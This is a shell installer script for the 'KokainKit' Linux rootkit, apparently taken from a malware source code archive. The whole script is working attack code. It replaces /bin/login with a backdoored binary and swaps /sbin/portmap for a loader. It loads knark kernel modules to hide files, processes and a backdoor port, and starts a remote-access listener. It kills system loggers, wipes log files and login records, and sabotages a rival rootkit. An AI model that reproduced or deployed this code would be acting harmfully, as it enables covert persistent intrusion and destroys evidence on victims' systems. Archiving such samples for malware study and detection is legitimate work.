MalwareSourceCode/Linux/Backdoors/Linux.Kokain.Backdoor

175 lines
4.4 KiB
Plaintext
Raw Normal View History

2020-10-11 03:00:44 +00:00
#!/bin/sh
# KokainKit v1.6 by deka
# -
# A rootkit based on knark and cobolt.
# Do not Distribute!
# -
TORNDIR=/usr/src/.puta
THEPASS=$1
DITTPORT=$2
THEDIR=/usr/lib/$THEPASS
echo "---------------------------------------"
echo " KokainKit v1.6 by dekah&self"
echo "---------------------------------------"
echo ""
echo "Using magic word $THEPASS and dittrichport $DITTPORT."
echo "Installing. Please stand by... (Pour yourself an ice cold coke and chill)"
if ! test "$(whoami)" = "root"; then
echo " - UID0 check failed"
echo ""
sleep 3
echo "FATAL: You're not root"
exit 1
fi
if test -d "$TORNDIR"; then
echo " - T0rnKit found. Screwing it up"
killall -9 in.inetd
killall -9 t0rntd
echo "$RANDOMdecryptThisT0rn :D" > /etc/ttyhash
echo "" > /usr/sbin/in.inetd
echo "ap" > $TORNDIR/.1file
echo "255.255" > $TORNDIR/.1addr
echo "255.255" > $TORNDIR/.1logz
echo "ap" > $TORNDIR/.1proc
fi
if ! test -d "/usr/include"; then
echo " - /usr/include does not exist, making it (ugly)..."
mkdir /usr/include
fi
if ! test -d "/usr/include/pwdb"; then
echo " - /usr/include/pwdb does not exist, making it (ugly)..."
mkdir /usr/include/pwdb
fi
mkdir $THEDIR
if test -d "$THEDIR"; then
echo " - Secret dir created"
else
echo " - MkDir failed"
echo ""
echo "FATAL: Unable to create the secret directory"
exit 1
fi
cd src
echo "#define MAGIC_WORD \"$THEPASS\"" > kokain.h
echo "#define MAGIC_DIR \"$THEDIR\"" >> kokain.h
gcc -O2 cobolt.c -o cobolt
if test -r "./cobolt"; then
echo " - Cobolt compiled"
else
echo " - gcc failed"
echo ""
cd ..
sleep 3
echo "FATAL: Unable to compile Cobolt"
exit 1
fi
touch -acmr /bin/login cobolt
cp /bin/login $THEDIR/login1
cp cobolt $THEDIR/login2
echo " - Cobolt installed"
gcc -O2 autoexec.c -o autoexec
if test -r "./autoexec"; then
echo " - AutoExec compiled"
else
echo " - gcc failed"
echo ""
cd ..
echo "FATAL: Unable to compile AutoExec"
exit 1
fi
touch -acmr /sbin/portmap autoexec
cp /sbin/portmap $THEDIR/portmap
rm -f /sbin/portmap
cp autoexec /sbin/portmap
echo "#!/bin/sh" > $THEDIR/autoexec
echo " - AutoExec installed"
cd ..
killall -9 syslogd klogd
./wipe u root >/dev/null 2>&1
rm -f /var/log/messages /var/log/secure
cp /var/log/messages.1 /var/log/messages >/dev/null 2>&1
cp /var/log/secure.1 /var/log/secure >/dev/null 2>&1
cp /var/log/messages.0 /var/log/messages >/dev/null 2>&1
cp /var/log/secure.0 /var/log/secure >/dev/null 2>&1
echo " - Logs cleaned"
#echo "" > /etc/hosts.allow
#echo "" > /etc/hosts.deny
#echo " - Hosts.deny/Hosts.allow cleaned"
echo " - Patching dittrich..."
./bpatch ./dittrich __PATCHPort__ $DITTPORT
cat <<E0F>> $THEDIR/.bashrc
alias ls="ls --color -alF"
alias dir="dir --color"
export PS1="\u@\h:\w# "
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin:$THEDIR:$THEDIR/stuff
cd
E0F
echo " - .bashrc created"
cp -R dittrich stuff $THEDIR
echo " - Stuff installed"
mkdir $THEDIR/knrk
cd knark
make >/dev/null 2>&1
echo " - Knark compiled"
cd ..
rm -rf knark/knrksrc knark/Makefile
cp -R knark/* $THEDIR/knrk
echo "/sbin/insmod -f $THEDIR/knrk/knrk.o" >> $THEDIR/autoexec
echo "/sbin/insmod -f $THEDIR/knrk/knrkmodhide.o" >> $THEDIR/autoexec
echo "$THEDIR/knrk/knrkhidef $THEDIR" >> $THEDIR/autoexec
echo "$THEDIR/knrk/knrkered /bin/login $THEDIR/login2" >> $THEDIR/autoexec
echo "$THEDIR/knrk/knrknethide \":`./tohex $DITTPORT`\"" >> $THEDIR/autoexec
echo "$THEDIR/dittrich" >> $THEDIR/autoexec
echo "killall -31 dittrich" >> $THEDIR/autoexec
/sbin/portmap >/dev/null 2>&1
echo " - Knark installed"
if test -d "/var/named/ADMROCKS"; then
rm -rf /var/named/ADMROCKS
echo " - AdmRocks erased"
fi
cat /etc/inetd.conf | grep -v "2222" > /tmp/blahah
rm -f /etc/inetd.conf
cp /tmp/blahah /etc/inetd.conf
rm -f /tmp/blahah
echo " - Inetd.conf fixed"
PATH=/sbin:$PATH
syslogd
klogd
echo " - Syslogd/Klogd restarted"
cd ..
rm -rf *kokain*
echo " - KokainKit removed"
echo ""
#echo "--x( th1z b0x n0w b3L0NgZ t0 j00! )x-- --x(.:tHE:kOkAiNkIt:.)x--"
if test -d "/proc/$THEPASS";
then
echo "Knark installed successfully."
else
echo " KNARK INSTALLATION FAILED - INSTALLING LOGIN BD"
cp $THEDIR/login2 /bin/login
fi
echo "kitinst $THEPASS $DITTPORT"
# - EoF - #